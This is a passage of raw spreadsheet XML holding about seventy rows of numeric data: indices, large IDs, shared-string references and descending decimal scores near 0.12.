      <c r="B20167" s="2">
        <v>5.0655546E7</v>
      </c>
      <c r="C20167" s="2" t="s">
        <v>19446</v>
      </c>
      <c r="D20167" s="2">
        <v>1.0</v>
      </c>
      <c r="E20167" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20167" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20168" ht="15.75" customHeight="1">
      <c r="A20168" s="1">
        <v>7773.0</v>
      </c>
      <c r="B20168" s="2">
        <v>5.2157979E7</v>
      </c>
      <c r="C20168" s="2" t="s">
        <v>19447</v>
      </c>
      <c r="D20168" s="2">
        <v>1.0</v>
      </c>
      <c r="E20168" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20168" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20169" ht="15.75" customHeight="1">
      <c r="A20169" s="1">
        <v>8020.0</v>
      </c>
      <c r="B20169" s="2">
        <v>5.2800118E7</v>
      </c>
      <c r="C20169" s="2" t="s">
        <v>19448</v>
      </c>
      <c r="D20169" s="2">
        <v>1.0</v>
      </c>
      <c r="E20169" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20169" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20170" ht="15.75" customHeight="1">
      <c r="A20170" s="1">
        <v>8256.0</v>
      </c>
      <c r="B20170" s="2">
        <v>5.3384847E7</v>
      </c>
      <c r="C20170" s="2" t="s">
        <v>19449</v>
      </c>
      <c r="D20170" s="2">
        <v>1.0</v>
      </c>
      <c r="E20170" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20170" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20171" ht="15.75" customHeight="1">
      <c r="A20171" s="1">
        <v>8583.0</v>
      </c>
      <c r="B20171" s="2">
        <v>5.4222615E7</v>
      </c>
      <c r="C20171" s="2" t="s">
        <v>19450</v>
      </c>
      <c r="D20171" s="2">
        <v>1.0</v>
      </c>
      <c r="E20171" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20171" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20172" ht="15.75" customHeight="1">
      <c r="A20172" s="1">
        <v>8680.0</v>
      </c>
      <c r="B20172" s="2">
        <v>5.4397102E7</v>
      </c>
      <c r="C20172" s="2" t="s">
        <v>19451</v>
      </c>
      <c r="D20172" s="2">
        <v>1.0</v>
      </c>
      <c r="E20172" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20172" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20173" ht="15.75" customHeight="1">
      <c r="A20173" s="1">
        <v>9641.0</v>
      </c>
      <c r="B20173" s="2">
        <v>5.6239803E7</v>
      </c>
      <c r="C20173" s="2" t="s">
        <v>19452</v>
      </c>
      <c r="D20173" s="2">
        <v>1.0</v>
      </c>
      <c r="E20173" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20173" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20174" ht="15.75" customHeight="1">
      <c r="A20174" s="1">
        <v>11389.0</v>
      </c>
      <c r="B20174" s="2">
        <v>2.1529428E7</v>
      </c>
      <c r="C20174" s="2" t="s">
        <v>19453</v>
      </c>
      <c r="D20174" s="2">
        <v>1.0</v>
      </c>
      <c r="E20174" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20174" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20175" ht="15.75" customHeight="1">
      <c r="A20175" s="1">
        <v>12567.0</v>
      </c>
      <c r="B20175" s="2">
        <v>2.9971617E7</v>
      </c>
      <c r="C20175" s="2" t="s">
        <v>19454</v>
      </c>
      <c r="D20175" s="2">
        <v>1.0</v>
      </c>
      <c r="E20175" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20175" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20176" ht="15.75" customHeight="1">
      <c r="A20176" s="1">
        <v>13564.0</v>
      </c>
      <c r="B20176" s="2">
        <v>3.5699829E7</v>
      </c>
      <c r="C20176" s="2" t="s">
        <v>19455</v>
      </c>
      <c r="D20176" s="2">
        <v>1.0</v>
      </c>
      <c r="E20176" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20176" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20177" ht="15.75" customHeight="1">
      <c r="A20177" s="1">
        <v>14061.0</v>
      </c>
      <c r="B20177" s="2">
        <v>3.7571608E7</v>
      </c>
      <c r="C20177" s="2" t="s">
        <v>19456</v>
      </c>
      <c r="D20177" s="2">
        <v>1.0</v>
      </c>
      <c r="E20177" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20177" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20178" ht="15.75" customHeight="1">
      <c r="A20178" s="1">
        <v>15023.0</v>
      </c>
      <c r="B20178" s="2">
        <v>4.1550528E7</v>
      </c>
      <c r="C20178" s="2" t="s">
        <v>19457</v>
      </c>
      <c r="D20178" s="2">
        <v>1.0</v>
      </c>
      <c r="E20178" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20178" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20179" ht="15.75" customHeight="1">
      <c r="A20179" s="1">
        <v>17028.0</v>
      </c>
      <c r="B20179" s="2">
        <v>4.8471518E7</v>
      </c>
      <c r="C20179" s="2" t="s">
        <v>19458</v>
      </c>
      <c r="D20179" s="2">
        <v>1.0</v>
      </c>
      <c r="E20179" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20179" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20180" ht="15.75" customHeight="1">
      <c r="A20180" s="1">
        <v>17876.0</v>
      </c>
      <c r="B20180" s="2">
        <v>5.1027859E7</v>
      </c>
      <c r="C20180" s="2" t="s">
        <v>19459</v>
      </c>
      <c r="D20180" s="2">
        <v>1.0</v>
      </c>
      <c r="E20180" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20180" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20181" ht="15.75" customHeight="1">
      <c r="A20181" s="1">
        <v>19751.0</v>
      </c>
      <c r="B20181" s="2">
        <v>5.6705061E7</v>
      </c>
      <c r="C20181" s="2" t="s">
        <v>19460</v>
      </c>
      <c r="D20181" s="2">
        <v>1.0</v>
      </c>
      <c r="E20181" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20181" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20182" ht="15.75" customHeight="1">
      <c r="A20182" s="1">
        <v>20238.0</v>
      </c>
      <c r="B20182" s="2">
        <v>1.0856037E7</v>
      </c>
      <c r="C20182" s="2" t="s">
        <v>19461</v>
      </c>
      <c r="D20182" s="2">
        <v>1.0</v>
      </c>
      <c r="E20182" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20182" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20183" ht="15.75" customHeight="1">
      <c r="A20183" s="1">
        <v>22046.0</v>
      </c>
      <c r="B20183" s="2">
        <v>3.0286568E7</v>
      </c>
      <c r="C20183" s="2" t="s">
        <v>19462</v>
      </c>
      <c r="D20183" s="2">
        <v>1.0</v>
      </c>
      <c r="E20183" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20183" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20184" ht="15.75" customHeight="1">
      <c r="A20184" s="1">
        <v>22349.0</v>
      </c>
      <c r="B20184" s="2">
        <v>3.4561651E7</v>
      </c>
      <c r="C20184" s="2" t="s">
        <v>19463</v>
      </c>
      <c r="D20184" s="2">
        <v>1.0</v>
      </c>
      <c r="E20184" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20184" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20185" ht="15.75" customHeight="1">
      <c r="A20185" s="1">
        <v>22569.0</v>
      </c>
      <c r="B20185" s="2">
        <v>3.8533435E7</v>
      </c>
      <c r="C20185" s="2" t="s">
        <v>19464</v>
      </c>
      <c r="D20185" s="2">
        <v>1.0</v>
      </c>
      <c r="E20185" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20185" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20186" ht="15.75" customHeight="1">
      <c r="A20186" s="1">
        <v>22687.0</v>
      </c>
      <c r="B20186" s="2">
        <v>4.2214093E7</v>
      </c>
      <c r="C20186" s="2" t="s">
        <v>19465</v>
      </c>
      <c r="D20186" s="2">
        <v>1.0</v>
      </c>
      <c r="E20186" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20186" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20187" ht="15.75" customHeight="1">
      <c r="A20187" s="1">
        <v>24430.0</v>
      </c>
      <c r="B20187" s="2">
        <v>1.0856036E7</v>
      </c>
      <c r="C20187" s="2" t="s">
        <v>19461</v>
      </c>
      <c r="D20187" s="2">
        <v>1.0</v>
      </c>
      <c r="E20187" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20187" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20188" ht="15.75" customHeight="1">
      <c r="A20188" s="1">
        <v>26187.0</v>
      </c>
      <c r="B20188" s="2">
        <v>1.6160882E7</v>
      </c>
      <c r="C20188" s="2" t="s">
        <v>19466</v>
      </c>
      <c r="D20188" s="2">
        <v>1.0</v>
      </c>
      <c r="E20188" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20188" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20189" ht="15.75" customHeight="1">
      <c r="A20189" s="1">
        <v>26919.0</v>
      </c>
      <c r="B20189" s="2">
        <v>1.9397036E7</v>
      </c>
      <c r="C20189" s="2" t="s">
        <v>19467</v>
      </c>
      <c r="D20189" s="2">
        <v>1.0</v>
      </c>
      <c r="E20189" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20189" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20190" ht="15.75" customHeight="1">
      <c r="A20190" s="1">
        <v>29064.0</v>
      </c>
      <c r="B20190" s="2">
        <v>3.0286567E7</v>
      </c>
      <c r="C20190" s="2" t="s">
        <v>19462</v>
      </c>
      <c r="D20190" s="2">
        <v>1.0</v>
      </c>
      <c r="E20190" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20190" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20191" ht="15.75" customHeight="1">
      <c r="A20191" s="1">
        <v>29364.0</v>
      </c>
      <c r="B20191" s="2">
        <v>3.1663316E7</v>
      </c>
      <c r="C20191" s="2" t="s">
        <v>19468</v>
      </c>
      <c r="D20191" s="2">
        <v>1.0</v>
      </c>
      <c r="E20191" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20191" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20192" ht="15.75" customHeight="1">
      <c r="A20192" s="1">
        <v>29938.0</v>
      </c>
      <c r="B20192" s="2">
        <v>3607478.0</v>
      </c>
      <c r="C20192" s="2" t="s">
        <v>19469</v>
      </c>
      <c r="D20192" s="2">
        <v>1.0</v>
      </c>
      <c r="E20192" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20192" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20193" ht="15.75" customHeight="1">
      <c r="A20193" s="1">
        <v>32101.0</v>
      </c>
      <c r="B20193" s="2">
        <v>5.4016806E7</v>
      </c>
      <c r="C20193" s="2" t="s">
        <v>19470</v>
      </c>
      <c r="D20193" s="2">
        <v>1.0</v>
      </c>
      <c r="E20193" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20193" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20194" ht="15.75" customHeight="1">
      <c r="A20194" s="1">
        <v>32619.0</v>
      </c>
      <c r="B20194" s="2">
        <v>5840027.0</v>
      </c>
      <c r="C20194" s="2" t="s">
        <v>19471</v>
      </c>
      <c r="D20194" s="2">
        <v>1.0</v>
      </c>
      <c r="E20194" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20194" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20195" ht="15.75" customHeight="1">
      <c r="A20195" s="1">
        <v>32899.0</v>
      </c>
      <c r="B20195" s="2">
        <v>6395523.0</v>
      </c>
      <c r="C20195" s="2" t="s">
        <v>19472</v>
      </c>
      <c r="D20195" s="2">
        <v>1.0</v>
      </c>
      <c r="E20195" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20195" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20196" ht="15.75" customHeight="1">
      <c r="A20196" s="1">
        <v>12677.0</v>
      </c>
      <c r="B20196" s="2">
        <v>3.0613619E7</v>
      </c>
      <c r="C20196" s="2" t="s">
        <v>19473</v>
      </c>
      <c r="D20196" s="2">
        <v>1.0</v>
      </c>
      <c r="E20196" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20196" s="2">
        <v>0.1235489220563848</v>
      </c>
    </row>
    <row r="20197" ht="15.75" customHeight="1">
      <c r="A20197" s="1">
        <v>1432.0</v>
      </c>
      <c r="B20197" s="2">
        <v>2.6653399E7</v>
      </c>
      <c r="C20197" s="2" t="s">
        <v>19474</v>
      </c>
      <c r="D20197" s="2">
        <v>1.0</v>
      </c>
      <c r="E20197" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20197" s="2">
        <v>0.1233766233766234</v>
      </c>
    </row>
    <row r="20198" ht="15.75" customHeight="1">
      <c r="A20198" s="1">
        <v>10295.0</v>
      </c>
      <c r="B20198" s="2">
        <v>5.7648472E7</v>
      </c>
      <c r="C20198" s="2" t="s">
        <v>19475</v>
      </c>
      <c r="D20198" s="2">
        <v>1.0</v>
      </c>
      <c r="E20198" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20198" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="20199" ht="15.75" customHeight="1">
      <c r="A20199" s="1">
        <v>32166.0</v>
      </c>
      <c r="B20199" s="2">
        <v>5.4491515E7</v>
      </c>
      <c r="C20199" s="2" t="s">
        <v>19476</v>
      </c>
      <c r="D20199" s="2">
        <v>1.0</v>
      </c>
      <c r="E20199" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20199" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="20200" ht="15.75" customHeight="1">
      <c r="A20200" s="1">
        <v>8580.0</v>
      </c>
      <c r="B20200" s="2">
        <v>5.4217149E7</v>
      </c>
      <c r="C20200" s="2" t="s">
        <v>19477</v>
      </c>
      <c r="D20200" s="2">
        <v>1.0</v>
      </c>
      <c r="E20200" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20200" s="2">
        <v>0.1231884057971015</v>
      </c>
    </row>
    <row r="20201" ht="15.75" customHeight="1">
      <c r="A20201" s="1">
        <v>26514.0</v>
      </c>
      <c r="B20201" s="2">
        <v>1.7621426E7</v>
      </c>
      <c r="C20201" s="2" t="s">
        <v>19478</v>
      </c>
      <c r="D20201" s="2">
        <v>1.0</v>
      </c>
      <c r="E20201" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20201" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="20202" ht="15.75" customHeight="1">
      <c r="A20202" s="1">
        <v>22544.0</v>
      </c>
      <c r="B20202" s="2">
        <v>3.8086133E7</v>
      </c>
      <c r="C20202" s="2" t="s">
        <v>19479</v>
      </c>
      <c r="D20202" s="2">
        <v>1.0</v>
      </c>
      <c r="E20202" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20202" s="2">
        <v>0.1230158730158731</v>
      </c>
    </row>
    <row r="20203" ht="15.75" customHeight="1">
      <c r="A20203" s="1">
        <v>2095.0</v>
      </c>
      <c r="B20203" s="2">
        <v>3.1302903E7</v>
      </c>
      <c r="C20203" s="2" t="s">
        <v>19480</v>
      </c>
      <c r="D20203" s="2">
        <v>1.0</v>
      </c>
      <c r="E20203" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20203" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="20204" ht="15.75" customHeight="1">
      <c r="A20204" s="1">
        <v>26080.0</v>
      </c>
      <c r="B20204" s="2">
        <v>1.564018E7</v>
      </c>
      <c r="C20204" s="2" t="s">
        <v>19481</v>
      </c>
      <c r="D20204" s="2">
        <v>1.0</v>
      </c>
      <c r="E20204" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20204" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="20205" ht="15.75" customHeight="1">
      <c r="A20205" s="1">
        <v>8837.0</v>
      </c>
      <c r="B20205" s="2">
        <v>5.4671367E7</v>
      </c>
      <c r="C20205" s="2" t="s">
        <v>19482</v>
      </c>
      <c r="D20205" s="2">
        <v>1.0</v>
      </c>
      <c r="E20205" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20205" s="2">
        <v>0.1226851851851852</v>
      </c>
    </row>
    <row r="20206" ht="15.75" customHeight="1">
      <c r="A20206" s="1">
        <v>978.0</v>
      </c>
      <c r="B20206" s="2">
        <v>2.2791226E7</v>
      </c>
      <c r="C20206" s="2" t="s">
        <v>19483</v>
      </c>
      <c r="D20206" s="2">
        <v>1.0</v>
      </c>
      <c r="E20206" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20206" s="2">
        <v>0.1226415094339623</v>
      </c>
    </row>
    <row r="20207" ht="15.75" customHeight="1">
      <c r="A20207" s="1">
        <v>14821.0</v>
      </c>
      <c r="B20207" s="2">
        <v>4.0958096E7</v>
      </c>
      <c r="C20207" s="2" t="s">
        <v>19484</v>
      </c>
      <c r="D20207" s="2">
        <v>1.0</v>
      </c>
      <c r="E20207" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20207" s="2">
        <v>0.1226415094339623</v>
      </c>
    </row>
    <row r="20208" ht="15.75" customHeight="1">
      <c r="A20208" s="1">
        <v>2641.0</v>
      </c>
      <c r="B20208" s="2">
        <v>3.462397E7</v>
      </c>
      <c r="C20208" s="2" t="s">
        <v>19485</v>
      </c>
      <c r="D20208" s="2">
        <v>1.0</v>
      </c>
      <c r="E20208" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20208" s="2">
        <v>0.1225749559082892</v>
      </c>
    </row>
    <row r="20209" ht="15.75" customHeight="1">
      <c r="A20209" s="1">
        <v>8450.0</v>
      </c>
      <c r="B20209" s="2">
        <v>5.3966621E7</v>
      </c>
      <c r="C20209" s="2" t="s">
        <v>19486</v>
      </c>
      <c r="D20209" s="2">
        <v>1.0</v>
      </c>
      <c r="E20209" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20209" s="2">
        <v>0.1225266362252664</v>
      </c>
    </row>
    <row r="20210" ht="15.75" customHeight="1">
      <c r="A20210" s="1">
        <v>20720.0</v>
      </c>
      <c r="B20210" s="2">
        <v>1.4652075E7</v>
      </c>
      <c r="C20210" s="2" t="s">
        <v>19487</v>
      </c>
      <c r="D20210" s="2">
        <v>1.0</v>
      </c>
      <c r="E20210" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20210" s="2">
        <v>0.1223958333333333</v>
      </c>
    </row>
    <row r="20211" ht="15.75" customHeight="1">
      <c r="A20211" s="1">
        <v>14100.0</v>
      </c>
      <c r="B20211" s="2">
        <v>3.774867E7</v>
      </c>
      <c r="C20211" s="2" t="s">
        <v>19488</v>
      </c>
      <c r="D20211" s="2">
        <v>1.0</v>
      </c>
      <c r="E20211" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20211" s="2">
        <v>0.1222222222222223</v>
      </c>
    </row>
    <row r="20212" ht="15.75" customHeight="1">
      <c r="A20212" s="1">
        <v>26988.0</v>
      </c>
      <c r="B20212" s="2">
        <v>1.975948E7</v>
      </c>
      <c r="C20212" s="2" t="s">
        <v>19489</v>
      </c>
      <c r="D20212" s="2">
        <v>1.0</v>
      </c>
      <c r="E20212" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20212" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="20213" ht="15.75" customHeight="1">
      <c r="A20213" s="1">
        <v>16621.0</v>
      </c>
      <c r="B20213" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C20213" s="2" t="s">
        <v>19490</v>
      </c>
      <c r="D20213" s="2">
        <v>1.0</v>
      </c>
      <c r="E20213" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20213" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="20214" ht="15.75" customHeight="1">
      <c r="A20214" s="1">
        <v>4260.0</v>
      </c>
      <c r="B20214" s="2">
        <v>4.1828799E7</v>
      </c>
      <c r="C20214" s="2" t="s">
        <v>19491</v>
      </c>
      <c r="D20214" s="2">
        <v>1.0</v>
      </c>
      <c r="E20214" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20214" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="20215" ht="15.75" customHeight="1">
      <c r="A20215" s="1">
        <v>6104.0</v>
      </c>
      <c r="B20215" s="2">
        <v>4.7718764E7</v>
      </c>
      <c r="C20215" s="2" t="s">
        <v>19492</v>
      </c>
      <c r="D20215" s="2">
        <v>1.0</v>
      </c>
      <c r="E20215" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20215" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="20216" ht="15.75" customHeight="1">
      <c r="A20216" s="1">
        <v>6122.0</v>
      </c>
      <c r="B20216" s="2">
        <v>4.7783372E7</v>
      </c>
      <c r="C20216" s="2" t="s">
        <v>19493</v>
      </c>
      <c r="D20216" s="2">
        <v>1.0</v>
      </c>
      <c r="E20216" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20216" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="20217" ht="15.75" customHeight="1">
      <c r="A20217" s="1">
        <v>8845.0</v>
      </c>
      <c r="B20217" s="2">
        <v>5.4723792E7</v>
      </c>
      <c r="C20217" s="2" t="s">
        <v>19494</v>
      </c>
      <c r="D20217" s="2">
        <v>1.0</v>
      </c>
      <c r="E20217" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20217" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="20218" ht="15.75" customHeight="1">
      <c r="A20218" s="1">
        <v>9103.0</v>
      </c>
      <c r="B20218" s="2">
        <v>5.5164321E7</v>
      </c>
      <c r="C20218" s="2" t="s">
        <v>19495</v>
      </c>
      <c r="D20218" s="2">
        <v>1.0</v>
      </c>
      <c r="E20218" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20218" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="20219" ht="15.75" customHeight="1">
      <c r="A20219" s="1">
        <v>15616.0</v>
      </c>
      <c r="B20219" s="2">
        <v>4.35457E7</v>
      </c>
      <c r="C20219" s="2" t="s">
        <v>19496</v>
      </c>
      <c r="D20219" s="2">
        <v>1.0</v>
      </c>
      <c r="E20219" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20219" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="20220" ht="15.75" customHeight="1">
      <c r="A20220" s="1">
        <v>17587.0</v>
      </c>
      <c r="B20220" s="2">
        <v>5.0289048E7</v>
      </c>
      <c r="C20220" s="2" t="s">
        <v>19497</v>
      </c>
      <c r="D20220" s="2">
        <v>1.0</v>
      </c>
      <c r="E20220" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20220" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="20221" ht="15.75" customHeight="1">
      <c r="A20221" s="1">
        <v>17772.0</v>
      </c>
      <c r="B20221" s="2">
        <v>5.0757292E7</v>
      </c>
      <c r="C20221" s="2" t="s">
        <v>19498</v>
      </c>
      <c r="D20221" s="2">
        <v>1.0</v>
      </c>
      <c r="E20221" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20221" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="20222" ht="15.75" customHeight="1">
      <c r="A20222" s="1">
        <v>16405.0</v>
      </c>
      <c r="B20222" s="2">
        <v>4.6293831E7</v>
      </c>
      <c r="C20222" s="2" t="s">
        <v>19499</v>
      </c>
      <c r="D20222" s="2">
        <v>1.0</v>
      </c>
      <c r="E20222" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20222" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="20223" ht="15.75" customHeight="1">
      <c r="A20223" s="1">
        <v>1472.0</v>
      </c>
      <c r="B20223" s="2">
        <v>2.7024672E7</v>
      </c>
      <c r="C20223" s="2" t="s">
        <v>19500</v>
      </c>
      <c r="D20223" s="2">
        <v>1.0</v>
      </c>
      <c r="E20223" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20223" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="20224" ht="15.75" customHeight="1">
      <c r="A20224" s="1">
        <v>1833.0</v>
      </c>
      <c r="B20224" s="2">
        <v>2.9344171E7</v>
      </c>
      <c r="C20224" s="2" t="s">
        <v>19501</v>
      </c>
      <c r="D20224" s="2">
        <v>1.0</v>
      </c>
      <c r="E20224" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20224" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="20225" ht="15.75" customHeight="1">
      <c r="A20225" s="1">
        <v>3556.0</v>
      </c>
      <c r="B20225" s="2">
        <v>3.8815505E7</v>
      </c>
      <c r="C20225" s="2" t="s">
        <v>19502</v>
      </c>
      <c r="D20225" s="2">
        <v>1.0</v>
      </c>
      <c r="E20225" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20225" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="20226" ht="15.75" customHeight="1">
      <c r="A20226" s="1">
        <v>5557.0</v>
      </c>
      <c r="B20226" s="2">
        <v>4.5974696E7</v>
      </c>
      <c r="C20226" s="2" t="s">
        <v>19503</v>
      </c>
      <c r="D20226" s="2">
        <v>1.0</v>
      </c>
      <c r="E20226" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20226" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="20227" ht="15.75" customHeight="1">
      <c r="A20227" s="1">
        <v>9338.0</v>
      </c>
      <c r="B20227" s="2">
        <v>5.5649802E7</v>
      </c>
      <c r="C20227" s="2" t="s">
        <v>19504</v>
      </c>
      <c r="D20227" s="2">
        <v>1.0</v>
      </c>
      <c r="E20227" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20227" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="20228" ht="15.75" customHeight="1">
      <c r="A20228" s="1">
        <v>15001.0</v>
      </c>
      <c r="B20228" s="2">
        <v>4.1466247E7</v>
      </c>
      <c r="C20228" s="2" t="s">
        <v>19505</v>
      </c>
      <c r="D20228" s="2">
        <v>1.0</v>
      </c>
      <c r="E20228" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20228" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="20229" ht="15.75" customHeight="1">
      <c r="A20229" s="1">
        <v>16866.0</v>
      </c>
      <c r="B20229" s="2">
        <v>4.7948337E7</v>
      </c>
      <c r="C20229" s="2" t="s">
        <v>19506</v>
      </c>
      <c r="D20229" s="2">
        <v>1.0</v>
      </c>
      <c r="E20229" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20229" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="20230" ht="15.75" customHeight="1">
      <c r="A20230" s="1">
        <v>18220.0</v>
      </c>
      <c r="B20230" s="2">
        <v>5.2101728E7</v>
      </c>
      <c r="C20230" s="2" t="s">
        <v>19507</v>
      </c>
      <c r="D20230" s="2">
        <v>1.0</v>
      </c>
      <c r="E20230" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20230" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="20231" ht="15.75" customHeight="1">
      <c r="A20231" s="1">
        <v>19027.0</v>
      </c>
      <c r="B20231" s="2">
        <v>5.4552554E7</v>
      </c>
      <c r="C20231" s="2" t="s">
        <v>19508</v>
      </c>
      <c r="D20231" s="2">
        <v>1.0</v>
      </c>
      <c r="E20231" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20231" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="20232" ht="15.75" customHeight="1">
      <c r="A20232" s="1">
        <v>14619.0</v>
      </c>
      <c r="B20232" s="2">
        <v>4.0279408E7</v>
      </c>
      <c r="C20232" s="2" t="s">
        <v>19509</v>
      </c>
      <c r="D20232" s="2">
        <v>1.0</v>
      </c>
      <c r="E20232" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20232" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="20233" ht="15.75" customHeight="1">
      <c r="A20233" s="1">
        <v>15823.0</v>
      </c>
      <c r="B20233" s="2">
        <v>4.4283862E7</v>
      </c>
      <c r="C20233" s="2" t="s">
        <v>19510</v>
      </c>
      <c r="D20233" s="2">
        <v>1.0</v>
      </c>
      <c r="E20233" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20233" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="20234" ht="15.75" customHeight="1">
      <c r="A20234" s="1">
        <v>33035.0</v>
      </c>
